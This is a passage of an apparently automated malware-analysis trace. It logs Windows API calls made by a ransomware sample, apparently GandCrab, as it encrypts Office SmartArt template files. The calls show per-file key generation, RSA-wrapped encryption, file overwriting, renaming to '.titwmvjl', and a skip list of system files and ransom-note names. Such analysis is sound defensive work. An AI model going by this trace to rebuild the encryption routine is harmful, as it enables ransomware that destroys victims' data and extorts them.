(hProv=0x4cdb38, dwFlags=0x0) returned 1 [0078.282] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.282] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.282] CryptAcquireContextW (in: phProv=0x259def4, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259def4*=0x4cdb38) returned 1 [0078.283] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.283] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259def8 | out: phKey=0x259def8*=0x503338) returned 1 [0078.283] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.283] CryptGetKeyParam (in: hKey=0x503338, dwParam=0x8, pbData=0x259deec, pdwDataLen=0x259def0, dwFlags=0x0 | out: pbData=0x259deec*=0x800, pdwDataLen=0x259def0*=0x4) returned 1 [0078.283] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.283] CryptEncrypt (in: hKey=0x503338, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259df24*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259df24*=0x100) returned 1 [0078.284] GetLastError () returned 0x0 [0078.284] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.284] CryptDestroyKey (hKey=0x503338) returned 1 [0078.284] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.284] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0078.284] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.284] CryptAcquireContextW (in: phProv=0x259def4, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259def4*=0x4cdb38) returned 1 [0078.285] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.285] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259def8 | out: phKey=0x259def8*=0x5037b8) returned 1 [0078.285] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.285] CryptGetKeyParam (in: hKey=0x5037b8, dwParam=0x8, pbData=0x259deec, pdwDataLen=0x259def0, dwFlags=0x0 | out: pbData=0x259deec*=0x800, pdwDataLen=0x259def0*=0x4) returned 1 [0078.285] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.285] CryptEncrypt (in: hKey=0x5037b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259df24*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259df24*=0x100) returned 1 [0078.285] GetLastError () returned 0x0 [0078.285] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.285] CryptDestroyKey (hKey=0x5037b8) returned 1 [0078.286] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.286] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0078.286] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2640000 [0078.286] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2750000 [0078.286] ReadFile (in: hFile=0x2ec, lpBuffer=0x2640000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259dfd0, lpOverlapped=0x0 | out: lpBuffer=0x2640000*, lpNumberOfBytesRead=0x259dfd0*=0x1093, lpOverlapped=0x0) returned 1 [0078.297] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0xffffef6d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.298] WriteFile (in: hFile=0x2ec, lpBuffer=0x2750000*, nNumberOfBytesToWrite=0x1093, lpNumberOfBytesWritten=0x259dfb4, lpOverlapped=0x0 | out: lpBuffer=0x2750000*, lpNumberOfBytesWritten=0x259dfb4*=0x1093, lpOverlapped=0x0) returned 1 [0078.300] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.300] WriteFile (in: hFile=0x2ec, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259dfb4, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259dfb4*=0x21c, lpOverlapped=0x0) returned 1 [0078.302] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.307] VirtualFree (lpAddress=0x2750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.307] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.307] CloseHandle (hObject=0x2ec) returned 1 [0078.309] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328905[[fn=Chevron Accent]].glox" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328905[[fn=chevron accent]].glox"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328905[[fn=Chevron Accent]].glox.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328905[[fn=chevron accent]].glox.titwmvjl"), dwFlags=0x1) returned 1 [0078.310] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.310] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259e084 | out: lpFindFileData=0x259e084) returned 1 [0078.310] lstrcmpW (lpString1="TM03328908[[fn=Circle Process]].glox", lpString2=".") returned 1 [0078.310] lstrcmpW (lpString1="TM03328908[[fn=Circle Process]].glox", lpString2="..") returned 1 [0078.310] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\", lpString2="TM03328908[[fn=Circle Process]].glox" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328908[[fn=Circle Process]].glox") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328908[[fn=Circle Process]].glox" [0078.310] lstrlenW (lpString=".titwmvjl") returned 9 [0078.310] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328908[[fn=Circle Process]].glox") returned 140 [0078.310] VirtualAlloc (lpAddress=0x0, dwSize=0x158, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0078.310] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328908[[fn=Circle Process]].glox.titwmvjl") returned 149 [0078.310] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328908[[fn=Circle Process]].glox") returned 140 [0078.310] lstrlenW (lpString=".glox") returned 5 [0078.310] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0078.311] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".glox ") returned 6 [0078.311] lstrcmpiW (lpString1=".glox", lpString2=".titwmvjl") returned -1 [0078.311] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.311] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328908[[fn=Circle Process]].glox") returned 140 [0078.311] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328908[[fn=Circle Process]].glox") returned 140 [0078.311] lstrcmpiW (lpString1="TM03328908[[fn=Circle Process]].glox", lpString2="desktop.ini") returned 1 [0078.311] lstrcmpiW (lpString1="TM03328908[[fn=Circle Process]].glox", lpString2="autorun.inf") returned 1 [0078.311] lstrcmpiW (lpString1="TM03328908[[fn=Circle Process]].glox", lpString2="ntuser.dat") returned 1 [0078.311] lstrcmpiW (lpString1="TM03328908[[fn=Circle Process]].glox", lpString2="iconcache.db") returned 1 [0078.311] lstrcmpiW (lpString1="TM03328908[[fn=Circle Process]].glox", lpString2="bootsect.bak") returned 1 [0078.311] lstrcmpiW (lpString1="TM03328908[[fn=Circle Process]].glox", lpString2="boot.ini") returned 1 [0078.311] lstrcmpiW (lpString1="TM03328908[[fn=Circle Process]].glox", lpString2="ntuser.dat.log") returned 1 [0078.311] lstrcmpiW (lpString1="TM03328908[[fn=Circle Process]].glox", lpString2="thumbs.db") returned 1 [0078.311] lstrcmpiW (lpString1="TM03328908[[fn=Circle Process]].glox", lpString2="TITWMVJL-DECRYPT.txt") returned 1 [0078.311] lstrcmpiW (lpString1="TM03328908[[fn=Circle Process]].glox", lpString2="TITWMVJL-DECRYPT.html") returned 1 [0078.311] lstrcmpiW (lpString1="TM03328908[[fn=Circle Process]].glox", lpString2="KRAB-DECRYPT.html") returned 1 [0078.311] lstrcmpiW (lpString1="TM03328908[[fn=Circle Process]].glox", lpString2="CRAB-DECRYPT.html") returned 1 [0078.311] lstrcmpiW (lpString1="TM03328908[[fn=Circle Process]].glox", lpString2="KRAB-DECRYPT.txt") returned 1 [0078.311] lstrcmpiW (lpString1="TM03328908[[fn=Circle Process]].glox", lpString2="CRAB-DECRYPT.txt") returned 1 [0078.311] lstrcmpiW (lpString1="TM03328908[[fn=Circle Process]].glox", lpString2="ntldr") returned 1 [0078.311] lstrcmpiW (lpString1="TM03328908[[fn=Circle Process]].glox", lpString2="NTDETECT.COM") returned 1 [0078.311] lstrcmpiW (lpString1="TM03328908[[fn=Circle Process]].glox", lpString2="Bootfont.bin") returned 1 [0078.311] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328908[[fn=Circle Process]].glox") returned 140 [0078.311] lstrlenW (lpString=".glox") returned 5 [0078.312] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0078.312] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".glox ") returned 6 [0078.312] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.312] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0078.312] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328908[[fn=Circle Process]].glox" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328908[[fn=circle process]].glox"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ec [0078.312] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.313] ReadFile (in: hFile=0x2ec, lpBuffer=0x2630000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259dfd0, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesRead=0x259dfd0*=0x21c, lpOverlapped=0x0) returned 1 [0078.321] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.321] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.321] CryptAcquireContextW (in: phProv=0x259df00, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259df00*=0x4cdb38) returned 1 [0078.322] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0078.322] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0078.322] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0078.322] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259df8c | out: pbBuffer=0x259df8c) returned 1 [0078.322] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.323] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0078.323] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.323] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.323] CryptAcquireContextW (in: phProv=0x259df00, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259df00*=0x4cdb38) returned 1 [0078.323] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0078.324] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0078.324] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0078.324] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259dfac | out: pbBuffer=0x259dfac) returned 1 [0078.324] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.324] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0078.324] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.324] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.324] CryptAcquireContextW (in: phProv=0x259def4, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259def4*=0x4cdb38) returned 1 [0078.325] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.325] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259def8 | out: phKey=0x259def8*=0x503338) returned 1 [0078.325] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.325] CryptGetKeyParam (in: hKey=0x503338, dwParam=0x8, pbData=0x259deec, pdwDataLen=0x259def0, dwFlags=0x0 | out: pbData=0x259deec*=0x800, pdwDataLen=0x259def0*=0x4) returned 1 [0078.325] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.325] CryptEncrypt (in: hKey=0x503338, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259df24*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259df24*=0x100) returned 1 [0078.326] GetLastError () returned 0x0 [0078.326] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.326] CryptDestroyKey (hKey=0x503338) returned 1 [0078.326] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.326] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0078.326] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.326] CryptAcquireContextW (in: phProv=0x259def4, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259def4*=0x4cdb38) returned 1 [0078.327] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.327] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259def8 | out: phKey=0x259def8*=0x503978) returned 1 [0078.327] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.327] CryptGetKeyParam (in: hKey=0x503978, dwParam=0x8, pbData=0x259deec, pdwDataLen=0x259def0, dwFlags=0x0 | out: pbData=0x259deec*=0x800, pdwDataLen=0x259def0*=0x4) returned 1 [0078.327] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.327] CryptEncrypt (in: hKey=0x503978, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259df24*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259df24*=0x100) returned 1 [0078.327] GetLastError () returned 0x0 [0078.327] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.328] CryptDestroyKey (hKey=0x503978) returned 1 [0078.328] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.328] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0078.328] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2640000 [0078.328] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2750000 [0078.328] ReadFile (in: hFile=0x2ec, lpBuffer=0x2640000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259dfd0, lpOverlapped=0x0 | out: lpBuffer=0x2640000*, lpNumberOfBytesRead=0x259dfd0*=0x41a6, lpOverlapped=0x0) returned 1 [0078.338] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0xffffbe5a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.338] WriteFile (in: hFile=0x2ec, lpBuffer=0x2750000*, nNumberOfBytesToWrite=0x41a6, lpNumberOfBytesWritten=0x259dfb4, lpOverlapped=0x0 | out: lpBuffer=0x2750000*, lpNumberOfBytesWritten=0x259dfb4*=0x41a6, lpOverlapped=0x0) returned 1 [0078.339] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.339] WriteFile (in: hFile=0x2ec, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259dfb4, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259dfb4*=0x21c, lpOverlapped=0x0) returned 1 [0078.341] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.345] VirtualFree (lpAddress=0x2750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.345] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.345] CloseHandle (hObject=0x2ec) returned 1 [0078.347] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328908[[fn=Circle Process]].glox" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328908[[fn=circle process]].glox"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328908[[fn=Circle Process]].glox.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328908[[fn=circle process]].glox.titwmvjl"), dwFlags=0x1) returned 1 [0078.347] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.348] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259e084 | out: lpFindFileData=0x259e084) returned 1 [0078.348] lstrcmpW (lpString1="TM03328916[[fn=Converging Text]].glox", lpString2=".") returned 1 [0078.348] lstrcmpW (lpString1="TM03328916[[fn=Converging Text]].glox", lpString2="..") returned 1 [0078.348] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\", lpString2="TM03328916[[fn=Converging Text]].glox" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328916[[fn=Converging Text]].glox") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328916[[fn=Converging Text]].glox" [0078.348] lstrlenW (lpString=".titwmvjl") returned 9 [0078.348] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328916[[fn=Converging Text]].glox") returned 141 [0078.348] VirtualAlloc (lpAddress=0x0, dwSize=0x15a, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0078.348] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328916[[fn=Converging Text]].glox.titwmvjl") returned 150 [0078.348] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328916[[fn=Converging Text]].glox") returned 141 [0078.348] lstrlenW (lpString=".glox") returned 5 [0078.348] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0078.348] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".glox ") returned 6 [0078.348] lstrcmpiW (lpString1=".glox", lpString2=".titwmvjl") returned -1 [0078.348] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.349] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328916[[fn=Converging Text]].glox") returned 141 [0078.349] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328916[[fn=Converging Text]].glox") returned 141 [0078.349] lstrcmpiW (lpString1="TM03328916[[fn=Converging Text]].glox", lpString2="desktop.ini") returned 1 [0078.349] lstrcmpiW (lpString1="TM03328916[[fn=Converging Text]].glox", lpString2="autorun.inf") returned 1 [0078.349] lstrcmpiW (lpString1="TM03328916[[fn=Converging Text]].glox", lpString2="ntuser.dat") returned 1 [0078.349] lstrcmpiW (lpString1="TM03328916[[fn=Converging Text]].glox", lpString2="iconcache.db") returned 1 [0078.349] lstrcmpiW (lpString1="TM03328916[[fn=Converging Text]].glox", lpString2="bootsect.bak") returned 1 [0078.349] lstrcmpiW (lpString1="TM03328916[[fn=Converging Text]].glox", lpString2="boot.ini") returned 1 [0078.349] lstrcmpiW (lpString1="TM03328916[[fn=Converging Text]].glox", lpString2="ntuser.dat.log") returned 1 [0078.349] lstrcmpiW (lpString1="TM03328916[[fn=Converging Text]].glox", lpString2="thumbs.db") returned 1 [0078.349] lstrcmpiW (lpString1="TM03328916[[fn=Converging Text]].glox", lpString2="TITWMVJL-DECRYPT.txt") returned 1 [0078.349] lstrcmpiW (lpString1="TM03328916[[fn=Converging Text]].glox", lpString2="TITWMVJL-DECRYPT.html") returned 1 [0078.349] lstrcmpiW (lpString1="TM03328916[[fn=Converging Text]].glox", lpString2="KRAB-DECRYPT.html") returned 1 [0078.349] lstrcmpiW (lpString1="TM03328916[[fn=Converging Text]].glox", lpString2="CRAB-DECRYPT.html") returned 1 [0078.349] lstrcmpiW (lpString1="TM03328916[[fn=Converging Text]].glox", lpString2="KRAB-DECRYPT.txt") returned 1 [0078.349] lstrcmpiW (lpString1="TM03328916[[fn=Converging Text]].glox", lpString2="CRAB-DECRYPT.txt") returned 1 [0078.349] lstrcmpiW (lpString1="TM03328916[[fn=Converging Text]].glox", lpString2="ntldr") returned 1 [0078.349] lstrcmpiW (lpString1="TM03328916[[fn=Converging Text]].glox", lpString2="NTDETECT.COM") returned 1 [0078.349] lstrcmpiW (lpString1="TM03328916[[fn=Converging Text]].glox", lpString2="Bootfont.bin") returned 1 [0078.349] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328916[[fn=Converging Text]].glox") returned 141 [0078.349] lstrlenW (lpString=".glox") returned 5 [0078.349] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0078.349] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".glox ") returned 6 [0078.350] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.350] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0078.350] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328916[[fn=Converging Text]].glox" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328916[[fn=converging text]].glox"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ec [0078.350] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.350] ReadFile (in: hFile=0x2ec, lpBuffer=0x2630000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259dfd0, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesRead=0x259dfd0*=0x21c, lpOverlapped=0x0) returned 1 [0078.360] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.360] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.360] CryptAcquireContextW (in: phProv=0x259df00, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259df00*=0x4cdb38) returned 1 [0078.361] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0078.361] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0078.361] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0078.361] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259df8c | out: pbBuffer=0x259df8c) returned 1 [0078.361] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.361] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0078.361] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.361] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.362] CryptAcquireContextW (in: phProv=0x259df00, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259df00*=0x4cdb38) returned 1 [0078.362] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0078.362] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0078.362] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0078.362] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259dfac | out: pbBuffer=0x259dfac) returned 1 [0078.362] LoadLibraryA 